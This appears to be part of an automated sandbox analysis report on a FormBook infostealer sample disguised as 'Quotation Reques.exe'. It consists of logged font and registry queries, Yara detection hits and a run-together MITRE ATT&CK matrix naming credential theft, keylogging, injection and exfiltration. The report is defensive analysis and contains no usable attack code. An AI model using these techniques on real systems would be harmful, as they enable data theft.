          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A3C49 GetSystemTime,SystemTimeToFileTime,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038443C GetVersion,
          Source: C:\Users\user\Desktop\Quotation Reques.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Scheduled Task/Job1Valid Accounts1Valid Accounts1Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Scheduled Task/Job1Access Token Manipulation1Valid Accounts1LSASS MemorySecurity Software Discovery351Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection612Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Scheduled Task/Job1Virtualization/Sandbox Evasion4NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDisable or Modify Tools1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection612Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information1DCSyncSystem Information Discovery125Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information41Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
